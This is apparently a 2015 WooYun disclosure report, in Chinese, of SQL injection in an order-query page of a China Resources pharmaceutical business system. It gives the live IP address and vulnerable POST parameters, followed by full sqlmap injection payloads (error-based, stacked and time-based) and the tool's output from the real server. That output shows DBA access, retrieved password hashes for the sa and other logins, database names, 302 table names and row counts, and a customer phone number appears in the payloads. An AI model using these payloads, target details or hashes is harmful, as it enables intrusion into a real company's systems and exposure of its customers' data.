当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137183

漏洞标题:华润医药商业集团某系统SQL注入(管理员权限)

相关厂商:华润三九医药股份有限公司

漏洞作者: Ysql404

提交时间:2015-08-28 16:07

修复时间:2015-10-16 23:24

公开时间:2015-10-16 23:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

华润医药集团有限公司是华润(集团)有限公司根据国务院国资委“打造央企医药平台”的要求,在重组央企华源集团、三九集团医药资源的基础上成立的大型药品制造和分销企业,为华润集团整合发展国内医药产业的全资企业。

详细说明:

注入地址:http://1.202.246.5:8080/OrderDetialInfo.aspx
注入参数:txtQOrder_CusPhone,txtQOrder_No
订单查询页面不应该暴露给未授权用户;

QQ图片20150826182616.png


QQ图片20150826185858.png




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtQOrder_CusPhone
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447' AND 7013=CONVERT(INT,(SELECT CHAR(113) CHAR(103) CHAR(120) CHAR(121) CHAR(113) (SELECT (CASE WHEN (7013=7013) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(110) CHAR(107) CHAR(97) CHAR(113))) AND 'uCHz'='uCHz&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447'; WAITFOR DELAY '0:0:5'--&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447' WAITFOR DELAY '0:0:5'--&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Place: POST
Parameter: txtQOrder_No
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333' AND 9417=CONVERT(INT,(SELECT CHAR(113) CHAR(103) CHAR(120) CHAR(121) CHAR(113) (SELECT (CASE WHEN (9417=9417) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(110) CHAR(107) CHAR(97) CHAR(113))) AND 'NYjm'='NYjm&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333'; WAITFOR DELAY '0:0:5'--&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333' WAITFOR DELAY '0:0:5'--&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: txtQOrder_CusPhone, type: Single quoted string (default)
[1] place: POST, parameter: txtQOrder_No, type: Single quoted string
[q] Quit


管理员权限

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:07:48] [INFO] testing if current user is DBA
current user is DBA:    True


database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
[17:08:13] [INFO] fetching database users password hashes
[17:08:13] [INFO] the SQL query used returns 3 entries
[17:08:13] [INFO] starting 3 threads
[17:08:13] [INFO] resumed: ##MS_PolicyEventProcessingLogin##
[17:08:13] [INFO] resumed: ##MS_PolicyTsqlExecutionLogin##
[17:08:13] [INFO] resumed: sa
[17:08:13] [INFO] retrieved: 0x01001d564a0be57513ab7b14df6772aa383c0867f4e9d5245d2d
[17:08:14] [INFO] retrieved: 0x0100bfb0cffb5f1daedb051380f8922c80d42241f836ed2aef8b
[17:08:14] [INFO] retrieved: 0x01004e7585c4bb3bdbd556505ed3541176bd329c22826c3f8b4b
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01001d564a0be57513ab7b14df6772aa383c0867f4e9d5245d2d
        header: 0x0100
        salt: 1d564a0b
        mixedcase: e57513ab7b14df6772aa383c0867f4e9d5245d2d
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100bfb0cffb5f1daedb051380f8922c80d42241f836ed2aef8b
        header: 0x0100
        salt: bfb0cffb
        mixedcase: 5f1daedb051380f8922c80d42241f836ed2aef8b
[*] sa [1]:
    password hash: 0x01004e7585c4bb3bdbd556505ed3541176bd329c22826c3f8b4b
        header: 0x0100
        salt: 4e7585c4
        mixedcase: bb3bdbd556505ed3541176bd329c22826c3f8b4b


数据库

available databases [8]:
[*] CCDMP
[*] CCDMPTest
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


数据表

Database: CCDMP
[302 tables]
+-------------------------+
| Address_Info            |
| Canal_Info              |
| CmdQueue_Info           |
| Customer_Info           |
| Customer_Info_DELBAK    |
| DDI_InboundQuery        |
| DDI_SalesQuery          |
| DDI_StockQuery          |
| DTPCommissioner_Info    |
| DTP_ERPSale             |
| DTP_goodsinf            |
| Department_Info         |
| Deputy_Info             |
| Distribution_Info       |
| DrugsType_Info          |
| Drugs_Info              |
| ERPGOODS_INF            |
| ERPHOSPITAL             |
| ERPINFORMATION          |
| ERPInbound_Info         |
| ERPSHOP_INSTORE         |
| ERPSTOCK                |
| EnterBaseDrugs_Info     |
| EnterDrugs_Info         |
| EnterDrugs_Info_back    |
| Enter_Info              |
| EquipNavigationNow_Info |
| EquipNavigationOld_Info |
| EquipTrack_Info         |
| EquipValidate_Head_Info |
| EquipValidate_Info      |
| Equip_Info              |
| Field_Info              |
| HeartBeat               |
| Hospital_Info           |
| Inbound_Info            |
| Inventory_Info          |
| LOG_INFO                |
| MAC_Info                |
| MedicationDetail_Info   |
| Menu_Info               |
| News_Info               |
| Node_Info               |
| OD_P_Record             |
| OD_Special              |
| OD_information          |
| Order_Head_Info         |
| Order_Head_Info_0328    |
| Order_Head_Info_DEL_BAK |
| Order_Info              |
| Order_List_Info         |
| Order_List_Info_DEL_BAK |
| P_Record                |
| P_Record_Sum            |
| Page_Info               |
| Price_Info              |
| ProductClass_Info       |
| ProductType_Info        |
| RecipelRemind_Info      |
| Role_Info               |
| SHM_CY                  |
| SHM_DD                  |
| SHM_NSD                 |
| SHM_RGHZ                |
| SHM_RGYY                |
| SMSAccount_Info         |
| SMS_Rev_Recorder        |
| SMS_Send_Recorder       |
| SaleRecord_Info         |
| SaleRecord_Info_0328    |
| SaleRecord_Info_DELBAK  |
| Scope_Info              |
| Sequence                |
| Stock_Info              |
| StorageRoom_Info        |
| StoreBaseDrugs_Info     |
| StoreDrugs_Info         |
| StoreDrugs_Info20130703 |
| StoreDrugs_Info20130729 |
| StuffType_Info          |
| SupervisionCode_Info    |
| SupervisionCode_NewInfo |
| Supplier_Info           |
| THAlarmData_Info        |
| THAlarmData_Info100     |
| THAlarmData_Info101     |
| THAlarmData_Info102     |
| THAlarmData_Info103     |
| THAlarmData_Info104     |
| THAlarmData_Info105     |
| THAlarmData_Info106     |
| THAlarmData_Info107     |
| THAlarmData_Info108     |
| THAlarmData_Info109     |
| THAlarmData_Info110     |
| THAlarmData_Info111     |
| THAlarmData_Info112     |
| THAlarmData_Info113     |
| THAlarmData_Info114     |
| THAlarmData_Info115     |
| THAlarmData_Info116     |
| THAlarmData_Info117     |
| THAlarmData_Info118     |
| THAlarmData_Info119     |
| THAlarmData_Info120     |
| THAlarmData_Info121     |
| THAlarmData_Info122     |
| THAlarmData_Info123     |
| THAlarmData_Info124     |
| THAlarmData_Info125     |
| THAlarmData_Info126     |
| THAlarmData_Info127     |
| THAlarmData_Info128     |
| THAlarmData_Info129     |
| THAlarmData_Info130     |
| THAlarmData_Info131     |
| THAlarmData_Info132     |
| THAlarmData_Info133     |
| THAlarmData_Info134     |
| THAlarmData_Info135     |
| THAlarmData_Info136     |
| THAlarmData_Info137     |
| THAlarmData_Info138     |
| THAlarmData_Info139     |
| THAlarmData_Info140     |
| THAlarmData_Info141     |
| THAlarmData_Info142     |
| THAlarmData_Info145     |
| THAlarmData_Info146     |
| THAlarmData_Info35      |
| THAlarmData_Info38      |
| THAlarmData_Info39      |
| THAlarmData_Info40      |
| THAlarmData_Info41      |
| THAlarmData_Info44      |
| THAlarmData_Info48      |
| THAlarmData_Info50      |
| THAlarmData_Info51      |
| THAlarmData_Info52      |
| THAlarmData_Info54      |
| THAlarmData_Info55      |
| THAlarmData_Info56      |
| THAlarmData_Info57      |
| THAlarmData_Info58      |
| THAlarmData_Info59      |
| THAlarmData_Info60      |
| THAlarmData_Info64      |
| THAlarmData_Info66      |
| THAlarmData_Info67      |
| THAlarmData_Info68      |
| THAlarmData_Info69      |
| THAlarmData_Info70      |
| THAlarmData_Info71      |
| THAlarmData_Info72      |
| THAlarmData_Info73      |
| THAlarmData_Info74      |
| THAlarmData_Info75      |
| THAlarmData_Info76      |
| THAlarmData_Info77      |
| THAlarmData_Info78      |
| THAlarmData_Info79      |
| THAlarmData_Info80      |
| THAlarmData_Info81      |
| THAlarmData_Info82      |
| THAlarmData_Info83      |
| THAlarmData_Info84      |
| THAlarmData_Info85      |
| THAlarmData_Info86      |
| THAlarmData_Info87      |
| THAlarmData_Info88      |
| THAlarmData_Info89      |
| THAlarmData_Info90      |
| THAlarmData_Info91      |
| THAlarmData_Info92      |
| THAlarmData_Info93      |
| THAlarmData_Info94      |
| THAlarmData_Info95      |
| THAlarmData_Info96      |
| THAlarmData_Info97      |
| THAlarmData_Info98      |
| THAlarmData_Info99      |
| THDataNow_Info          |
| THDataOld_Info          |
| THDataOld_Info100       |
| THDataOld_Info101       |
| THDataOld_Info102       |
| THDataOld_Info103       |
| THDataOld_Info104       |
| THDataOld_Info105       |
| THDataOld_Info106       |
| THDataOld_Info107       |
| THDataOld_Info108       |
| THDataOld_Info109       |
| THDataOld_Info110       |
| THDataOld_Info111       |
| THDataOld_Info112       |
| THDataOld_Info113       |
| THDataOld_Info114       |
| THDataOld_Info115       |
| THDataOld_Info116       |
| THDataOld_Info117       |
| THDataOld_Info118       |
| THDataOld_Info119       |
| THDataOld_Info120       |
| THDataOld_Info121       |
| THDataOld_Info122       |
| THDataOld_Info123       |
| THDataOld_Info124       |
| THDataOld_Info125       |
| THDataOld_Info126       |
| THDataOld_Info127       |
| THDataOld_Info128       |
| THDataOld_Info129       |
| THDataOld_Info130       |
| THDataOld_Info131       |
| THDataOld_Info132       |
| THDataOld_Info133       |
| THDataOld_Info134       |
| THDataOld_Info135       |
| THDataOld_Info136       |
| THDataOld_Info137       |
| THDataOld_Info138       |
| THDataOld_Info139       |
| THDataOld_Info140       |
| THDataOld_Info141       |
| THDataOld_Info142       |
| THDataOld_Info145       |
| THDataOld_Info146       |
| THDataOld_Info35        |
| THDataOld_Info38        |
| THDataOld_Info39        |
| THDataOld_Info40        |
| THDataOld_Info41        |
| THDataOld_Info44        |
| THDataOld_Info48        |
| THDataOld_Info50        |
| THDataOld_Info51        |
| THDataOld_Info52        |
| THDataOld_Info54        |
| THDataOld_Info55        |
| THDataOld_Info56        |
| THDataOld_Info57        |
| THDataOld_Info58        |
| THDataOld_Info59        |
| THDataOld_Info60        |
| THDataOld_Info64        |
| THDataOld_Info66        |
| THDataOld_Info67        |
| THDataOld_Info68        |
| THDataOld_Info69        |
| THDataOld_Info70        |
| THDataOld_Info71        |
| THDataOld_Info72        |
| THDataOld_Info73        |
| THDataOld_Info74        |
| THDataOld_Info75        |
| THDataOld_Info76        |
| THDataOld_Info77        |
| THDataOld_Info78        |
| THDataOld_Info79        |
| THDataOld_Info80        |
| THDataOld_Info81        |
| THDataOld_Info82        |
| THDataOld_Info83        |
| THDataOld_Info84        |
| THDataOld_Info85        |
| THDataOld_Info86        |
| THDataOld_Info87        |
| THDataOld_Info88        |
| THDataOld_Info89        |
| THDataOld_Info90        |
| THDataOld_Info91        |
| THDataOld_Info92        |
| THDataOld_Info93        |
| THDataOld_Info94        |
| THDataOld_Info95        |
| THDataOld_Info96        |
| THDataOld_Info97        |
| THDataOld_Info98        |
| THDataOld_Info99        |
| THDataOld_Info_back     |
| THDataOld_Info_standard |
| THRecord_Info           |
| UserDrugs_Info          |
| UserPage_Info           |
| UserRole_Info           |
| UserSR_Info             |
| User_Info               |
| ValidateNode_Info       |
| Visit_Info              |
| aaaaa                   |
| d_accept                |
| d_batsale               |
| d_sale                  |
| d_store                 |
| information             |
| njy_DDYY                |
| price_infobak           |
| shm                     |
| sysdiagrams             |
| ybqx_buy                |
| ybqx_price              |
+-------------------------+


表中的记录数

Database: CCDMP
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.THDataOld_Info          | 118152987 |
| dbo.THAlarmData_Info        | 35430085 |
| dbo.THDataOld_Info130       | 12120666 |
| dbo.THDataOld_Info101       | 7099863 |
| dbo.THDataOld_Info122       | 6858860 |
| dbo.THDataOld_Info59        | 6529550 |
| dbo.THDataOld_Info80        | 6404923 |
| dbo.THDataOld_Info117       | 5979157 |
| dbo.THDataOld_Info126       | 5489651 |
| dbo.THDataOld_Info111       | 5449853 |
| dbo.THDataOld_Info73        | 5322715 |
| dbo.THDataOld_Info74        | 4916352 |
| dbo.THDataOld_Info92        | 4812170 |
| dbo.THDataOld_Info85        | 4717805 |
| dbo.THDataOld_Info68        | 4641865 |
| dbo.THDataOld_Info50        | 4627863 |
| dbo.THDataOld_Info35        | 4103525 |
| dbo.THAlarmData_Info59      | 4019693 |
| dbo.THDataOld_Info114       | 3649618 |
| dbo.THAlarmData_Info92      | 3130856 |
| dbo.THDataOld_Info66        | 3085026 |
| dbo.THDataOld_Info70        | 2818019 |
| dbo.THDataOld_Info56        | 2769260 |
| dbo.THAlarmData_Info101     | 2630018 |
| dbo.THDataOld_Info41        | 2188063 |
| dbo.THDataOld_Info121       | 2135919 |
| dbo.THDataOld_Info76        | 1959584 |
| dbo.THAlarmData_Info50      | 1826072 |
| dbo.THDataOld_Info58        | 1549921 |
| dbo.THAlarmData_Info76      | 1547915 |
| dbo.THAlarmData_Info80      | 1546071 |
| dbo.THDataOld_Info142       | 1431666 |
| dbo.THDataOld_Info51        | 1418512 |
| dbo.THDataOld_Info104       | 1291850 |
| dbo.THAlarmData_Info85      | 1275112 |
| dbo.THAlarmData_Info66      | 1264669 |
| dbo.THDataOld_Info125       | 1254613 |
| dbo.THAlarmData_Info111     | 1166330 |
| dbo.THAlarmData_Info122     | 1149449 |
| dbo.THAlarmData_Info114     | 1083765 |
| dbo.THAlarmData_Info70      | 991497  |
| dbo.THAlarmData_Info126     | 981989  |
| dbo.d_batsale               | 968490  |
| dbo.THAlarmData_Info73      | 887400  |
| dbo.THAlarmData_Info35      | 880379  |
| dbo.THDataOld_Info129       | 860839  |
| dbo.THDataOld_Info134       | 839201  |
| dbo.THAlarmData_Info142     | 826102  |
| dbo.THAlarmData_Info58      | 792807  |
| dbo.THAlarmData_Info74      | 733190  |
| dbo.THAlarmData_Info130     | 732697  |
| dbo.THAlarmData_Info56      | 707536  |
| dbo.THAlarmData_Info68      | 692299  |
| dbo.THDataOld_Info96        | 634828  |
| dbo.THAlarmData_Info41      | 634166  |
| dbo.THAlarmData_Info51      | 624801  |
| dbo.THDataOld_Info40        | 617805  |
| dbo.THAlarmData_Info125     | 568474  |
| dbo.THAlarmData_Info96      | 504961  |
| dbo.THRecord_Info           | 473961  |
| dbo.THAlarmData_Info134     | 431632  |
| dbo.THAlarmData_Info129     | 387905  |
| dbo.THDataOld_Info88        | 365029  |
| dbo.THAlarmData_Info121     | 322187  |
| dbo.DDI_StockQuery          | 318938  |
| dbo.THAlarmData_Info117     | 310308  |
| dbo.THAlarmData_Info104     | 249920  |
| dbo.THAlarmData_Info88      | 227904  |
| dbo.StoreBaseDrugs_Info     | 219772  |
| dbo.THAlarmData_Info40      | 216119  |
| dbo.d_sale                  | 154208  |
| dbo.THDataOld_Info_back     | 148040  |
| dbo.SupervisionCode_Info    | 127685  |
| dbo.d_accept                | 109960  |
| dbo.EquipTrack_Info         | 84449   |
| dbo.EnterBaseDrugs_Info     | 67228   |
| dbo.ybqx_price              | 56136   |
| dbo.LOG_INFO                | 51086   |
| dbo.THDataOld_Info52        | 47554   |
| dbo.Inventory_Info          | 43799   |
| dbo.SMS_Send_Recorder       | 40540   |
| dbo.Order_List_Info         | 39020   |
| dbo.Order_Head_Info         | 37054   |
| dbo.SaleRecord_Info         | 33014   |
| dbo.THDataOld_Info67        | 27637   |
| dbo.THDataOld_Info83        | 22209   |
| dbo.THDataOld_Info108       | 21842   |
| dbo.THAlarmData_Info52      | 20490   |
| dbo.THDataOld_Info146       | 18156   |
| dbo.THDataOld_Info82        | 18028   |
| dbo.THDataOld_Info145       | 17643   |
| dbo.Customer_Info           | 17471   |
| dbo.THAlarmData_Info67      | 16173   |
| dbo.DDI_SalesQuery          | 15377   |
| dbo.MedicationDetail_Info   | 14483   |
| dbo.P_Record                | 14159   |
| dbo.OD_P_Record             | 13739   |
| dbo.ERPInbound_Info         | 13712   |
| dbo.d_store                 | 13252   |
| dbo.THAlarmData_Info83      | 11497   |
| dbo.SaleRecord_Info_0328    | 10394   |
| dbo.THAlarmData_Info108     | 10337   |
| dbo.THDataOld_Info69        | 9530    |
| dbo.THAlarmData_Info145     | 8337    |
| dbo.THDataOld_Info81        | 8309    |
| dbo.Order_Head_Info_0328    | 7752    |
| dbo.Price_Info              | 7474    |
| dbo.THAlarmData_Info146     | 6743    |
| dbo.THAlarmData_Info69      | 6515    |
| dbo.Drugs_Info              | 4870    |
| dbo.THDataOld_Info109       | 4847    |
| dbo.Stock_Info              | 4698    |
| dbo.Inbound_Info            | 4689    |
| dbo.information             | 4044    |
| dbo.P_Record_Sum            | 3991    |
| dbo.EnterDrugs_Info_back    | 3939    |
| dbo.OD_information          | 3938    |
| dbo.ERPSTOCK                | 3820    |
| dbo.ERPINFORMATION          | 3463    |
| dbo.HeartBeat               | 3329    |
| dbo.THAlarmData_Info82      | 3280    |
| dbo.SHM_RGHZ                | 3161    |
| dbo.THDataOld_Info127       | 3037    |
| dbo.THAlarmData_Info127     | 2701    |
| dbo.THDataOld_Info107       | 2680    |
| dbo.THAlarmData_Info109     | 1835    |
| dbo.THDataOld_Info116       | 1828    |
| dbo.ERPSHOP_INSTORE         | 1826    |
| dbo.THAlarmData_Info107     | 1644    |
| dbo.THAlarmData_Info81      | 1555    |
| dbo.THDataOld_Info119       | 1461    |
| dbo.DDI_InboundQuery        | 1309    |
| dbo.THDataOld_Info128       | 1182    |
| dbo.THDataOld_Info115       | 1131    |
| dbo.THAlarmData_Info128     | 1117    |
| dbo.THDataOld_Info139       | 1089    |
| dbo.ybqx_buy                | 812     |
| dbo.THAlarmData_Info119     | 774     |
| dbo.THAlarmData_Info116     | 688     |
| dbo.THDataOld_Info102       | 667     |
| dbo.EnterDrugs_Info         | 616     |
| dbo.Hospital_Info           | 576     |
| dbo.THAlarmData_Info139     | 573     |
| dbo.THDataNow_Info          | 559     |
| dbo.SHM_DD                  | 459     |
| dbo.StoreDrugs_Info         | 459     |
| dbo.CmdQueue_Info           | 424     |
| dbo.Node_Info               | 403     |
| dbo.THDataOld_Info64        | 387     |
| dbo.Address_Info            | 385     |
| dbo.THDataOld_Info103       | 370     |
| dbo.ProductClass_Info       | 343     |
| dbo.THAlarmData_Info64      | 331     |
| dbo.THAlarmData_Info115     | 292     |
| dbo.price_infobak           | 287     |
| dbo.THAlarmData_Info102     | 267     |
| dbo.THDataOld_Info136       | 246     |
| dbo.THDataOld_Info71        | 231     |
| dbo.THAlarmData_Info71      | 218     |
| dbo.THDataOld_Info100       | 197     |
| dbo.User_Info               | 192     |
| dbo.THAlarmData_Info75      | 188     |
| dbo.THDataOld_Info75        | 188     |
| dbo.UserRole_Info           | 188     |
| dbo.DTP_goodsinf            | 184     |
| dbo.ERPHOSPITAL             | 184     |
